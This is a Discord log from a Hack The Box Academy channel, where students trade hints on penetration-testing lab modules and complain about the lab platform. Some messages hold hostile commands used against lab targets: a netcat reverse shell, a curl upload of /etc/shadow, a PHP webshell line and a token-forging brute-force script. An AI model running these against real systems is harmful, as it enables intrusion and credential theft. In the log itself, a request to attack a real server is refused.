#modules

1 messages · Page 12 of 1

lament tartan
#

yesterday spent 1-2 hours just watching it freeze every few seconds before giving up

brave prawn
#

Hey, need help with Windows PrivEsc Module. Currently, I'm on section DnsAdmins. Successfuly added netadm to Domain Admins group, but can't read flag.txt. It seems that I am skipping something, but idk what...

lilac vortex
#

hello

vital adder
vital adder
brave prawn
lament tartan
vital adder
#

yea me too the new pwnbox suck

vital adder
brave prawn
vital adder
# lament tartan ughhhhh i hate pwnbox as well 😠 i just wanna use my VM 😥

ok so i double hate the new pwnbox now, some of the exploit in metasploit don't work for me but it's seem like the exploit was success but i don't get any shell and after some debugging i found out i need to run metasploit as root or some exploit don't work because metasploit don't have permission to use some port

vital seal
#

Need help 🙂

**Path **: Penetration Tester
Module: ATTACKING COMMON SERVICES
Question: What is the password for the username "jason"?

Tried brute forcing SMB using crackmapexec and metasploit (smb_logon) via passwords.list (acquired from ftp server). No luck.

lament tartan
#

is there a way to fix the broken instance timers? theyve been ok for me recently but now again back to counting down at about 5x the actual speed

wind gust
#

Hey guys for the footprint module regarding IMAP/POP3. I logged in and checked every inbox and tehy all say 0 EXISTS 0 RECENT

dry mica
#

quit

vital adder
#

@vital seal @fierce sparrow which section?

vital adder
vital seal
wind gust
vital adder
vital adder
solar granite
#

I just made a list of the directories I should be searching, and quickly checked them out by hand. The flag was so obvious. I must have been blind the first time I tried the challenge as I missed that dir.

vital seal
vital adder
#

what ftp server? i don't remember that and there are no mention of that in my note i mean the given wordlist from the resource

#

oh wait

#

let me double check everything

vital seal
#

sure! It was from ftp server, passwords.list

wind gust
vital adder
vital seal
vital adder
vital seal
#

oh lmao

#

thank you so much!!!

edgy ridge
#

Hello all, I'm working on the Information Gathering - Web Edition module and I'm stuck on the Active Subdomain enumeration section question that asks for a TXT record "Find and submit the contents of the TXT record as the answer." Been using dig and nslookup with no luck. Could someone DM me or give me a nudge on this? Think I've been stuck in a rabbit hole for a while now. I'm able to perform the zone transfer but I don't think I'm looking in the right place for the TXT record.

vital adder
#

i'm not sure what even is a dns zone but if you do a dns zone transfer with the mean do main you will find a subdomain that have the same ip as the mean domain use dig txt with that subdomain

solar granite
#

Hi, need some help with hacking wordpress, skills assessment: Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download. I have found the vulnerable plugin (my answer for the next question, plugin version is correct), and I can exploit the vulnerability to see any files. But, where's the flag file?

Edit: once you find and exploit the unauthenticated file download vulnerability, the flag will appear.

vital adder
#

check that plugin on exploit-db check flag in that exploit example

solar granite
vital adder
#

oh wait which question?

solar granite
# vital adder oh wait which question?

Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download, from skills assessment. I'm trying to use ||Site Editor||

vital adder
#

oh that one and the LFI one is different

#

and nope it it's the ||Site Editor||

grave lance
#

stuck on last stretch of footprinting lab hard
|| any hints after logging in as tom on footprint lab hard? Struggling to find a way to access mysql server ||

vital adder
#

hint check what is running on the target machine

solar granite
# vital adder check that plugin on exploit-db check flag in that exploit example

Sorry to keep bothering, but I still can't find the flag file for this question. I've now done all of them, including getting a shell on the system as www-data.
I also tried looking for flag files on the system with find / -name "*flag*" 2>/dev/null, but only found the one I already have, from the directory listing question.
Or is the answer to this question not a flag?

vital adder
#

nope it's a flag but for fing this plugin i have to run the wpscan with the api and the aggressive tag it took like 30 min but i think you should be able to find it with just the api key

#

and i didn't check where is that flag on the target machine so i'm not 100% sure but if you scan / it's going to take a bit but try this grep -irl HTB{ / 2>>/dev/null

solar granite
# vital adder nope it's a flag but for fing this plugin i have to run the wpscan with the api ...

I tried scanning with ||wpscan --api-token REDACTED --url http://blog.inlanefreight.local/ -e ap||, and I found ||3 plugins: email-subscribers (7 vulns), site-editor (1 vuln), and the-events-calendar (2 vulns)||.
I tried again find / -iname "*flag*" 2>/dev/null for case insensitive but only got the same flags I got before. I'll try your grep command, but it takes a long time to run and so far only found 2 flags, that I already knew (/home/erika, and the one from directory indexing)

vital adder
#

and yep one of the plugin you list in the one look at verion and name up in exploit-db

grave lance
#

@vital adder went and checked running services on the target. but still at a loss
|| I am ssh'd into the target as tom, I see mysql is running (rsync is there but not running) and then there are the services from nmap (pop3,imaps, ssh). There is a strange file /opt/tom-recovery.sh but it didn't lead anywhere||

vital adder
#

hint the first thing you list

wanton harness
#

Hi

#

Mam dotaz

#

pls help

#

Can you hack?

vital adder
wanton harness
#

I don't want to do something for the event

#

I want to put this gang on one server and destroy it

#

Can you please help?

#

That server is Czech

#

Please

vital adder
#

not the event the channel and nope read the #rules

wanton harness
#

Pls

#

and why don't you help me

#

?

vital adder
#

this is the place for learning cyber security not a darknet forums, what do you think?

urban sage
wanton harness
#

Pls

#

i need it please

urban sage
# wanton harness Pls

No. If you continue to ask either publicly or by messaging members, you will be removed from this server. We are not your private army to commit crime for you.

solar granite
vital adder
#

np

wind gust
#

why do ports not show properly on HTB labs

timber hatch
#

Hi evervybody
I am at the modul footprinting... there is this command:
braa public@10.129.14.128:.1.3.6.*

can somebody explain the command? from the modul explanation i dont get it really...

vital adder
#

i think you need to put some spoiler tag on that
sorry didn't realized that was the example command

#

but the command it's: (tool) (community strings)@(ip):(stuff that i don't understand)

#

oh wait they explain this

polar crag
#

this nomachine setup is terrible.. absolute cancer to work with it

wind gust
polar crag
#

its because it uses a us keyboard layout

wind gust
#

For the footprinting lab - hard I only see pop and imap ports open should there be additional ports....? what am i missing

polar crag
#

took me a while to figure it out lmao

#

you can spawn a keyboard and type it that way

grave lance
#

@vital adder looking more into that service; sorry for repeated messages
|| Not sure how to get access to the mysql db without credentials; All I can think of is to try and brute force some user:passwd combos (maybe using user mysql)||

polar crag
#

then when inside change the layout

vital adder
timber hatch
grave lance
wind gust
vital adder
#

hint you can use wordlist in the example

vital adder
#

nope not the given one

wind gust
#

what example you talking about

#

oh isee

#

thx

spice dock
#

which module should i do if i wanna become a hacker ?

polar crag
#

Modul: Prohacker in 1 Day

#

start with the basics and then learn more

spice dock
#

ok thx

celest lake
#

Can someone please confirm that Getting Started / Public Exploits are working?

I can't get the flag either by the public or metasploit method

Using the method from exploit db
I am able to navigate and download things like wp-config.php with content inside

But I have tried /flag.txt
And trying to ../.. / my way to root folder

Also I am not able to get wp-config using metasploit

Using freshly installed Parrot OS

warm turret
#

Finally 🥳 i completed Command Injections https://academy.hackthebox.com/achievement/433014/109. I did a payload generator so if someone wants to use it. Here it is https://github.com/josemlwdf/1nj3ct0r

GitHub

This is a Command Injection payload generator made with Python 3 - GitHub - josemlwdf/1nj3ct0r: This is a Command Injection payload generator made with Python 3

warm turret
gentle willow
celest lake
gentle willow
celest lake
wind gust
#

for the footprint lab hard - can i get a hint regarding the creds once sshd in? (to be able to use database)

wind gust
#

LMAO

wind gust
#

forgot about that ahahahha

#

crazyy thx, im in

vital adder
#

and if you are too lazy to find the flag like me you can use this ||select * from users where username = "HTB";||

wind gust
wise nimbus
celest lake
celest lake
wind gust
#

Guys in the shells and payload. Im trying to start the live engagement by connecting to nomachine. Im putting everything correctly but cant sign in

#

im using HTB machine

#

cant even rdp to it too.

rustic sage
#

you are typing the wrong password

wind gust
rustic sage
#

thats not the password

#

its longer than that

wind gust
#

HTB_@cademy_stdnt!

#

gonna restart and try again

#

oh it worked when restarted weird.

#

which interface to i listen on when im inside the nomachine?

polar crag
#

guys Payloads and Shells module, i try to copy the 50064 exploit. Finished the steps but somehow i cant update my db it either no permission or it fails

#

and when searching for the exploit it still tells me not found

vital adder
#

try reload_all

wind gust
vital adder
#

the only thing i have about that in my note is 172.16.1.5

polar crag
#

need to note that :S

polar crag
#

Finally done with payloads and shells... The skill assessment took almost as long as the rest of the module

mellow turtle
#

gj

#

🙂

#

are u going for the cert? @polar crag

polar crag
#

which cert are you talking about? ^^

#

My goal is the oscp yes

#

hopefully next year

mellow turtle
#

this one

polar crag
#

there is still a ton to learn

#

oh

#

is this new?

mellow turtle
#

yeah

#

u are doing that path

polar crag
#

damn nice

#

i will check it out

#

but yes im doing the Jr Pen teser path right now

#

are you going for it?

mellow turtle
#

yeah, i got the bug bounty hunter one and now ill go for this one

#

then ill jump to oscp

polar crag
#

awesome

#

once im done with the pentester path i will do the bug bounty path ^^

#

just to get more knowledge

mellow turtle
#

nice

sour raptor
#

Hey, so doing the network enumeration with nmap module. Hit a question that is asking to enumerate the host name. I have tried several switches with nmap, but nothing is resolving the host name. Looking for help on trying to understand what I am over looking.

marble raft
#

Hi can someone give me a nudge on Password Attacks Lab - Medium? Already got the D user but can't find a way to get root.

Edit: Got it, the key to overcoming the challenge is very close to one's own home

safe adder
#

Cannot upload photo. Some sort of error?

#

Drag and drop not working.

west canopy
raven scarab
#

Is anyone running into issues with their VPN? When I turn mine on, not only can I not see the target system, I cant ping any site at all :/

thorn urchin
#

any chance youre mixing the academy VPN with the main site vpn

raven scarab
#

Nope

thorn urchin
#

then dunno, its been working fine for me today

raven scarab
#

In fact, I am getting a resolution error now that I look at the VPN log

#

2022-10-03 20:54:58 RESOLVE: Cannot resolve host address: edge-us-academy-1.hackthebox.eu:1337 (Temporary failure in name resolution)

thorn urchin
#

try swapping server

wheat garden
raven scarab
#

Okay, I think that worked

#

Thanks friends 🙂

sturdy igloo
#

anyone know how to fix this error:

#

[ERROR][com.freerdp.client.x11] - failed to open display:
[ERROR][com.freerdp.client.x11] - Please check that the $DISPLAY environment variable is properly set.

#

trying to xfreerdp to a host from attack box provided in sectioin AD Skills Assessment II

sour raptor
#

Now.. trying to tackel the Firewall and IDS/IPS- Hard lab. I can only find two tcp ports, but neither ones version is the answer...

rustic sage
#

Error opening local file flag.txt
What's wrong?

west canopy
rustic sage
west canopy
#

cd ~/

rustic sage
west canopy
rustic sage
#

=d

#

Oh

rustic sage
feral stump
high totem
#

Quick question about the File Transfer module - is there a way to upload a zip to pwnbox? The task asks to upload a zip file to the windows target machine and I wonder how to get this file into the pwnbox first 😅

rustic sage
#

Guys, are you planning to develop a Cloud module in short term?

sonic patrol
#

Can anyone tell me how this blood server works?

sour raptor
#

Holy Shit I got it. I can not believe I didn't try one stupid switch. Granted the only time I have used it was when listening, not try to make a connection.

placid quest
#

@fierce sparrow what is the problem

rustic sage
#

How to stop a Target instance? It ticks my minutes away also when idle...

zealous belfry
#

Hey, i am completly stuck on the last question in footprinting DNS What is the FQDN of the host where the last octet ends with "x.x.x.203"? I used dns enum and also dig for zone transfer, but i cant find anything else than the internal.inlanefreight.htb subdomains which are all not transferable.

placid quest
#

@zealous belfry what about on dev.inlanefright.htb

zealous belfry
#

i found those but nothing more interesting dev.inlanefreight.htb 127.0.0.1 ns.dev.inlanefreight.htb - 10.129.18.200 mail1.dev.inlanefreight.htb - 10.12.3.112 dev2.dev.inlanefreight.htb - 10.12.3.6 dev1.dev.inlanefreight.htb -

placid quest
#

@zealous belfry brute force dev.inlanefreight.htb

zealous belfry
timid pollen
#

hi guys i am having issue with the module : Stack-Based Buffer Overflows on Windows x86 in remote code execution
my understanding is that you still need to be connected to the machine via remote in order to execute the program, however there is no username and pass provided in order to login. thanks

balmy moon
#

Good morning! Is there anyone that can help me with transfers using Curl?

thin roost
#

ERROR 2013 (HY000): Lost connection to MySQL server at 'handshake: reading initial communication packet', system error: 11 --> db instances seem broken

thin roost
balmy moon
#

Hey, yeah, I'm using this command

curl -X POST https://10.10.16.7/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure

#

It isn't uploading to the upload server I have running

#

I've tried it without quotes with double quotes

vital adder
#

if you are using updog try curl -v -X POST -F "file=@/home/htb-ac453129/test;filename=test" -F "path=/home/htb-ac453129/test" http://127.0.0.1:9090/upload

balmy moon
#

using uploadserver

thin roost
#

port ok?

balmy moon
#

didn't specify because https

#

on the upload server I'm seeing

[04/Oct/2022 07:57:16] "POST /upload HTTP/1.1" 400 -

thin roost
balmy moon
#

When I tried @rustic sage I get this...

<p>Message: Field "files" not found.</p>
<p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>

thin roost
#

actually should u use -T?

balmy moon
#

instead of s?

#

or F

thin roost
#

s is silent...not important..it kills verbose output...but -T instead of -F

balmy moon
#

That was different...

curl: Can't open 'data=@test.txt'!

thin roost
balmy moon
#

Interestingly when I added -X in addition to -T , I got this...

   <p>Error code: 501</p>
    <p>Message: Unsupported method ('-F').</p>
    <p>Error code explanation: HTTPStatus.NOT_IMPLEMENTED - Server does not support this operation.</p>
vast geyser
#

Hello,Could some one give me hint about Brute Forcing Cookies question 1?
I try the following but can't get flag
||user:htbuser;role:student;time:1664883421
user:super user;role:superuser;time:1664883421
user:super user;role:student;time:1664883421
user:super user;role:superuser;time:1664883421
user:htbuser;role:super user;time:1664883421
user:htbuser;role:superuser;time:1664883421||

cosmic dock
wind gust
cosmic dock
#

Yeah, still invalid password.

wind gust
#

If you are doing an @ sign you have to do shift+"

cosmic dock
#

Figures. Thanks for the help. I'm really getting tired of these nuanced issues in the platform/modules

wind gust
#

same

#

but its worth. amazing content

cosmic dock
#

Still isn't working

#

Got it. Had to use the on-screen keyboard.

wind gust
#

nice

#

nomachine setup is very bad

#

i hope i dont face it again

cosmic dock
#

I just enabled SSH on it and stopped using nomachine

#

however, the machine itself becomes unresponsive every 2-3 minutes either way, big fan of that

#

Its practically unusable

#

I have to kill the process every couple of minutes

wind gust
#

Anyone did Password Mutations (bruteforce ssh - sam)? I spent the entire lab time bruteforcing till my lab finished and it didnt crack it....

lethal atlas
brave prawn
#

Hey, I am on Credential Hunting section in Windows PrivEsc module. Found file ||st...txt||, but HTB doesn't accept my answer. Can someone help?

wind gust
vital adder
brave prawn
vital adder
#

yep

#

that section is evil there is a shiton of trap

lethal atlas
wind gust
#

its so annoying that I have to install crackmapexec everytime i spin up the machine....

placid quest
#

@wind gust install crackmapexec on your machine

wind gust
placid quest
#

@wind gust so you will install cme every time you start the pwnbox

wind gust
#

just saying it should be more convenient for the people that use the PWNBOX

wind gust
#

its not a deal breaker but annoying to say the least

placid quest
#

@wind gust that is why i had to stop using pwnbox due to installing tools every time i start it

brave prawn
solar granite
#

Hi guys, need some help with XSS Session Hijacking. None of the payloads listed in the lesson seem to work.

Edit: solved. I forgot the http:// part in my payload.

mellow turtle
#

cross site scripting module? @solar granite

solar granite
#

Yes

mellow turtle
#

dm me

rustic sage
#

it seems that i can't ping the target in the "Web Enumeration" in the "Getting Started" module even when using the good IP, any reasons why ?

vital adder
raven cairn
#

Can I have help with the web attacks skills assessment? I found out how to || get user tokens, reset user passwords, and login as other users || but all the pages look the same. Having difficulties getting the admin user. 😭

vital adder
#

in the ||/api.php/user/|| you can get user uid and you can get the admin user uid there but the admin username ||doesn't have "admin"|| in it but the word ||Admin|| does appear when you get the right uid

raven cairn
#

I am using a python script to manually automate all of this. Did you do this in Burp???

vital adder
#

yep i use burp

#

oh and i scan script this in bash but i have do to some stuff right now i can make the script a send you that but i need a good bit right now

rustic sage
#

bit help

#

stuck at this Fuzz the web application for exposed parameters, then try to exploit it with one of the LFI wordlists to read /flag.txt

vital adder
rustic sage
#

File Inclusion/Automated Scanning

vital adder
#

so did you find the vulnerable parameter?

rustic sage
#

i did not

#

i fuzzed

#

fuz result was messy it didnt even bring anything

vital adder
#

if you are using ffuf and there is too much false positive use some filter

#

and for finding the vulnerable parameter you can use the example command in at section under Fuzzing Parameters (but you need to add some filter)

rustic sage
#

let me try

vital adder
#

oh and of you don't know what filter to try hint ||response size||

lean bobcat
#

were do i lean to hack

#

idk how

#

?

polar crag
#

tried bruteforcing rdp with hydra but i always got failed due to many errors
however i got the creds for rdp by bruteforcing smb with metasploit, wishend i would get them with rdp and hydra :S

vital adder
#

oh wait this sounds familiar are you in the password attacks module?

polar crag
#

ye

#

did it worked for you with hydra and rdp?

vital adder
#

yea just i help help i guy that have the same issue

#

all i have in my note is this will crash the target machine so do last

#

and yes i think i did use hydra for that not sure how i got the cred in the end

polar crag
#

i got the flag for that answer but i try to find a solution to that but thanks!

rustic sage
#

so i like

#

can't even do the module entirely

vital adder
vital adder
rustic sage
#

gobuster dir -u http:// targetip -w /usr/share/dirb/wordlist/common.txt

polar crag
#

[ERROR] all children were disabled due too many connection errors
0 of 1 target completed, 0 valid password found
[INFO] Writing restore file because 2 server scans could not be completed
[ERROR] 1 target was disabled because of too many errors
[ERROR] 1 targets did not complete

#

this is what i get

rustic sage
#

response size is set with -fs ?

#

in ffuf module

vital adder
vital adder
vital adder
rustic sage
#

42 i guess

#

is the false pos

rustic sage
#

@vital adder

#

im using

#
ffuf -w Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://167.99.202.193:31162/index.php?FUZZ=value' -mc 200 -fs 42 -c -v```
#

i'll recheck that tmrw and i'll send a SS here

vital adder
vital adder
rustic sage
vital adder
#

yeah then that's the issue

#

oh wait that target have a puclic ip

rustic sage
vital adder
#

yep

rustic sage
#

this is lfi wait i think the other one is needed

#
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287```
#

right

vital adder
#

oh yeah sorry this is the first one you need

rustic sage
#

filter for 2287 gives me hella false positives

#

so should i make it like the other sections 42

vital adder
#

of that is what you see the most then yes

rustic sage
#

response was 200

#

smh

vital adder
#

@rustic sage try restart your target a couple time if you still can't access it try my target

#

but if you can access my target but not your then you need to report this issue to support but if you also can't access my target then there is an issue with your machine

vital adder
rustic sage
#

result i get

rustic sage
vital adder
# rustic sage

did you filter out 42? and you need to filter out 2309

rustic sage
#

hmm

#

yeah

#

i am trying rn

#

2309

#

okkkkk

#

finally

vital adder
#

nice

rustic sage
#

i didnt know i should filter 2309

#

thanks bruv

#

its
view

#

found the flag

#

lesgooooooooooooooo

#

for anyone else doing the LFI thing

#

when u find the parameter
run Jhdix text on ?parameter=FUZZ and filter for 1935
the first result will be the ../../{sometimes}/etc/passwd
so u need to delete etc/passwd and put /flag.txt

graceful mortar
#

im stuck in LFI assigment module, could someone help me to use the log poisoning?

graceful mortar
graceful mortar
#

already did

mystic perch
#

I remember there was nothing but cheat sheet in this module

graceful mortar
#

seens php is not allowing code injections

mystic perch
#

hm

#

check my notes

#

one minute

warm turret
#

someone can give mea hint on Skill Assessment - Broken Authentication

rustic sage
#

Hi, did someone have same problem as me in Oopsie machine, I am currently trying to estabilish a reverse shell with the victim, it works but I can't send any commands

#

lemme send the script that I used

#

also, I don't have any firewall installed

warm turret
#

@rustic sage there is a channel for machines #boxes

rustic sage
graceful mortar
rustic sage
#

before I verified myself

graceful mortar
#

when i was using <?php system($_GET["cmd"]); ?> with "" not worked, i need to use 'cmd' not "cmd", in website, is wrote with "" double quotes, it was a fucking brain

#

@mystic perch

mystic perch
#

im look this machine

#

one minute

warm turret
#

someone can give mea hint on Skill Assessment - Broken Authentication

raven cairn
#

For anybody who is doing the web attacks skills assessment can somebody explain why I get a different admin page?

mystic perch
#

did u get ?

safe token
#

hey. its not related to the modules but idk where to ask. so my problem is that i want to resubscribe to the student plan stuff but it requires a 3D authentication or verification but nothing really happenes. i mean a pop up window show up for a few sec but then just disappeares and nothing happens. what should i do? whats the issue?

graceful mortar
vital adder
#

finally!! the living hell is over 🥳 🎉

#

half of the tool i need isn't there but half of the issue is but still 🥳

wind gust
#

wait they updated it?

vital adder
#

the wallpaper

wind gust
#

thats it?

#

eww tools still not there

#

lmao

vital adder
#

at least wpscan work now

wind gust
#

the pwnbox is way laggier now...

tidal peak
#

Seems like the htb-student / HTB_@cademy_stdnt! userpass combo is not working for the foothold on the Shells & Payloads skills assessment. Tried resetting pwnbox and target but neither solves the issue

west canopy
tidal peak
#

Oh wow, that indeed does the trick. Odd issue

wind gust
#

Yes the keyboard layout is fucked

west canopy
#

i think we are gonna try and update the module so it doesn't require nomachine

sharp hawk
#

Starting my hacking career today!

tidal peak
sharp hawk
#

Was certified by comptia a few months ago but was unsure of what career to pursue

mystic perch
wind gust
sharp hawk
#

to become more well rounded im trying to pick up some of these skills

sharp hawk
sharp hawk
brisk spear
#

Hi starting today as well

west canopy
#

welcome @sharp hawk and @brisk spear 🙂

brisk spear
#

Thanks

#

what next??

west canopy
#

hack the planet obviously

brisk spear
#

and what is my next step into that I mean??

sharp hawk
#

a little confused

#

how do I get my root flag?

balmy radish
#

Getting the flags is usually done by identifying a vulnerability that had been covered in the module and exploiting it. Modules also have cheat sheets in them and some of the questions have a hint button

brisk spear
#

alright what are root flags?

sharp hawk
brisk spear
#

Really?

sharp hawk
#

Yeah

brisk spear
#

Eeem got a question for you guys,,, do I have to master javascript or python before I can progress in this??

balmy radish
#

No, and there is a tier 0 python 3 academy module if you are new to python

#

My mistake it is tier 1

#

If you aren’t doing Academy, but are working on starting point, then can check #welcome for info on how to verify. After that you can post in #starting-point

brisk spear
#

Ok

rustic sage
#

Hi, i have a problem with this question. Can someone help me? Split the network 10.200.20.0/27 into 4 subnets and submit the broadcast address of the 2nd subnet as the answer.

raven cairn
#

😭

rustic sage
#

same!

#

i hate it 🙂

vale salmon
#

I'm looking for a possible nudge on AD Enum & Attacks Skills Assessment II getting the flag on Admin desktop of DC01. I found the credentials for ||CT059||, but the ||SMB shares|| give me nothing and I can't ||RDP|| or ||evil-winrm|| to it either.

prisma mason
#

hello did you ever figure this one out im stuck on the first question"To get the flag, use the same payload we used above, but change its JavaScript code to show the cookie instead of showing the url."

raven scarab
#

Hiya! Doing the Linux Buffer Overflow module. Ive confirmed that I have the correct offset (I overwrite the EIP with \x66), so I go back and select an address in the middle of the NOPs that precede my shellcode. However, when I run this command, I get a Illegal instruction error :/ am I picking a bad address or something?

#

Actually, now that I am looking at it, the characters dont match up...the chars right before the return address do not match the end of the shellcode I input

glass locust
#

o

orchid ingot
#

Can someone help with "Skills Assessment - File Upload Attacks"? I'm stuck on being unable to locate the uploaded file.

#

Not sure where I'm missing. I tried to read the source code but do not see the way.

languid ginkgo
orchid ingot
#

Only image files are allowed like png,jpg

languid ginkgo
charred mist
#

Good night guys, I'm new here #br

#

which do you prefer, parrot or Kali?

orchid ingot
languid ginkgo
vale salmon
#

OMG I'm finally finished with the Active Directory module. Thank the gods.

sturdy igloo
prisma mason
#

Hello I’m currently stuck on this question in the XSS module, "To get the flag, use the same payload we used above, but change its JavaScript code to show the cookie instead of showing the url."

#

Can someone please point me in the right direction

vale salmon
vast geyser
#

Hi~ Could someone help me about Brute Forcing Cookies question 1 and 2 of BROKEN AUTHENTICATION😫
I have find out the decode step:
||question 1 : url -->base64 -->ascii hex
question 2 : Zlib --> base64 --> URL Encode||
but I don't know how to change about ||" user:htbuser;role:htbuser;time:1664935096"||

rustic sage
#

Guys, are you planning to develop a Cloud module in short term?

mystic perch
placid quest
#

@mystic perch parrot

past oxide
#

hey i'm doing the starting point module in htb, there is part where i have to connect with the redis server in the target machine through redis-cli. but whenever i give the command "redis-cli -h hostname -p port", the terminal doesn't show anything and never connects. is there any solution for this?

placid quest
#

@fierce sparrow yes

acoustic owl
acoustic owl
brave prawn
#

Hey, I am on module Windows PrivEsc section Windows Server. Did someone try other exploits than Task Scheduler? I have just tried all vulns that the target seems to have, but nothing works. Anyway, the module tells not to use the shown exploit and there are many vulns that you can use to esc your privs.

vital adder
#

i think this unintended but try metasploit exploit suggester

past oxide
brave prawn
vital adder
brave prawn
vital adder
#

ohh so that is the intended way

west ore
#

Hows currently doing HTB Academy?

#

I'm currently doing Linux Fundamentals...

west ore
#

?

vital adder
#

so what is the issue?

rustic sage
#

guys im at lfi file inclusion prevention

#

second question

#

edited the php.ini file

#

in /var/www/html/ i put the php.shell

#

restarted the apache2 server

#

now how can i
Read the /var/log/apache2/error.log file and fill in the blank: system() has been disabled for ________ reasons.

clear bough
#

hy guys i'm on Broken Authentication module on predictable tokens at the question "Create a token on the web application exposed at subdirectory /question1/ using the Create a reset token for htbuser button. Within an interval of +-1 second a token for the htbadmin user will also be created. The algorithm used to generate both tokens is the same as the one shown when talking about the Apache OpenMeeting bug. Forge a valid token for htbadmin and login by pressing the "Check" button. What is the flag?" .... i have used this script

#

but it doesn't work... can anyone tell me where i wrong??

#

|| import requests
import time
from hashlib import md5

url = "http://134.209.26.70:31469/question1/"
data = {"submit": "htbuser"}
res = requests.post(url,data=data)
server_time = res.headers['Date']
temp_time = time.strptime(server_time, "%a, %d %b %Y %H:%M:%S %Z")
epoch_time = int(time.mktime(temp_time) * 1000)

start_time = epoch_time - 1000
end_time = epoch_time + 1000
fail_text = "Wrong token"

loop from start_time to now. + 1 is needed because of how range() works

for x in range(start_time, end_time + 1):
# get token md5
md5_token = md5(("htbadmin" + str(x)).encode()).hexdigest()
data = {
"submit": "check",
"token": md5_token
}

print("checking {} {}".format(str(x), md5_token))

# send the request
res = requests.post(url, data=data)

# response text check
if not fail_text in res.text:
    print(res.text)
    print("[*] Congratulations! raw reply printed before")
    exit()

||

lucid gate
#

stuck on password attack hard lab,
Cracked the backup file but can't mount it .. any hint?

vast geyser
#

Could someone tell me why the result are different?

fading ridge
#

Hi everybody, anybody done with UserEnum in broken authentication? Let me know got a question ❤️

solar granite
#

Where can I report something that I think is wrong in a topic lesson? I'm talking about SQL Injection Fundamentals -> SQL Operators -> Multiple Operator Precedence (https://academy.hackthebox.com/module/33/section/192). The precedence listed in the topic is different from the precedence listed on mariadb documentation, linked in the lesson.

What I mean is the not operator ! is misplaced. In the topic it is below 3 other groups of operators, and on mariadb docs the not operator is almost at the very top, being the 3rd in precedence overall

west ore
#

Has anyone done linux Funadmentals?

lethal atlas
lethal atlas
west ore
#

In the Academy do we have to answer all the questions to mark it complete ?

vast geyser
lethal atlas
#

yes

clear bough
lethal atlas
vast geyser
lethal atlas
#

dm me if you wanna get into the code

clear bough
rustic sage
#

guys the machines dont respond

stone jacinth
#

??

rustic sage
#

yeah sloppy for a while but its getting better

lethal atlas
rustic sage
#

yes but its better now

stone jacinth
rustic sage
#

maybe

#

can u help me on sum

stone jacinth
#

Sum?

rustic sage
#

something

stone jacinth
#

What is it?

rustic sage
#

on file inclusion

#

second last

#

topic

#

File Inclusion Prevention

stone jacinth
#

I am out, you can post here someone here will help you of they wish so.

rustic sage
#

i posted but got ignored haha

#

anws dw take care

wind gust
#

Need help on the Credential Hunting in Linux - I got a list of mutated version password from the hint but still cant seem to find the correct password.

spark fiber
#

Hi Friends,

Checking if anyone would be kind to offers some assistance, specifically regarding the Academy Module: Getting Started> Knowledge Check.

I solved the first part as follows: enumerated sub-domains with Gobuster, explored files, admin.xml mentioned ‘admin’ as a username (as part of email address), and then also provided a hashed password which was cracked with crackstation.com, revealed to be admin:admin. Logged into site, saw there was a notification on Support page, mentioned GetSimple CMS 3.3.15 being outdated.

Found an exploit on rapid7.com; used msfconsole to successfully exploit target, was able to get
first flag and complete question 01.

Leading us to the second (Privilege Escalation) part…

(Context: I am brand new to HTB and infosec in general, started September 4th. This is my first module, so at present I am learning how to do things without necessarily understanding why, with the faith that said understanding will develop in future. So in terms of approaching this problem I pretty much have the methodology used in Nibbles to go by at this point, not any experiential depth at all.)

I was able to download LinEnum on my system, and upload it onto target in Meterpreter. I then changed Meterpreter to a shell, gave executable privileges to LinEnum.sh, ran it, which produced a single notable result:

User www-data may run the following commands on gettingstarted:
(ALL : ALL) NOPASSWD: /usr/bin/php

I thus assumed I would be able to append php (as we did with monitor.sh in Nibbles), however since it seems its a folder, I was unsure how this could be done. So indeed I can’t access the folder, and when I try to append it with echo the following error occurs:
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.171 8443 >/tmp/f' | tee -a php tee: php: Permission denied

I tried sudo etc, many approaches, but stuck here. Would really appreciate any breadcrumb anyone might offer at this point.

Thanks!

lethal atlas
lethal atlas
lethal atlas
solar granite
# spark fiber Hi Friends, Checking if anyone would be kind to offers some assistance, specifi...

There's a linux fundamentals module which might help you, not sure if you've taken it or what's covered, I haven't taken it myself.
In this case, learning what sudo does would be very helpful and lead you to the answer to your issue.

User www-data may run the following commands on gettingstarted: 
(ALL : ALL) NOPASSWD: /usr/bin/php

The above lines are really all you need to get root. Think of what ||sudo|| does and what ||/usr/bin/php|| is and what it does as well.

wind gust
#

i tried different version of it too

lethal atlas
#

the mut_password.list file has the password its just way down in there and you usually time out before getting to it

sage jackal
#

Active Directory Enumeration and Attacks Skills 1; I got the Kerberoastable users password but not sure how to get to MS01 any help?

spark fiber
solar granite
wind gust
#

i hate bruteforcing so much

solar granite
flint agate
#

case 8

south lark
#

Anyone having timeout issues with the PHP webshell lab in the Shells & Payloads module? The target cannot seem to stay stable for more than a minute or so

flint agate
#

not working

#

is that a zero or an "o" ?

#

it says anti-csrf token can't be found

spark fiber
lethal atlas
flint agate
#

it think i need to declare cookies somehow

charred mist
#

someone online?

lethal atlas
#

lots

flat silo
#

I would like to get someone's input on if I'm missing something with a question in the ffuf module assessment can someone message me please

flint agate
#

can you send me a DM for sqlmap module please ?

#

i am really stuck here and the connection keeps ending I don't know why

south lark
#

my rdp and ssh connections are getting refused to the foothold machine for the final challenge in the Shells & Payloads module. Is this is bug with the deployment? Trying to use anything other than the NoMachine connection because it is extremely unstable

lethal atlas
south lark
#

sigh

ancient sleet
#

sup guys! i cant pass the broken authentication skills assessment. i tried to bruteforce password of support account but no one password is match. here is command i used to collect passwords:
grep '^[[:upper:]]' ./SecLists/Passwords/Leaked-Databases/rockyou.txt | grep '[[:lower:]]' | grep '[[:digit:]]$' | grep '[[:punct:]]' | grep -E '^.{20,}$' >> pass.txt
what im doing wrong?

south lark
#

I can barely keep the nomachine connection alive long enough to browse to the web interface 🙃

placid quest
#

@rustic sage what is the problem

cosmic dock
#

Random question:

#

Why does the metasploit prompt in the parrot machine differ from that of the normal metasploit prompt in kali?

#

The installed plugins are the exact same, and the parrot version is actually slightly behind the kali distro

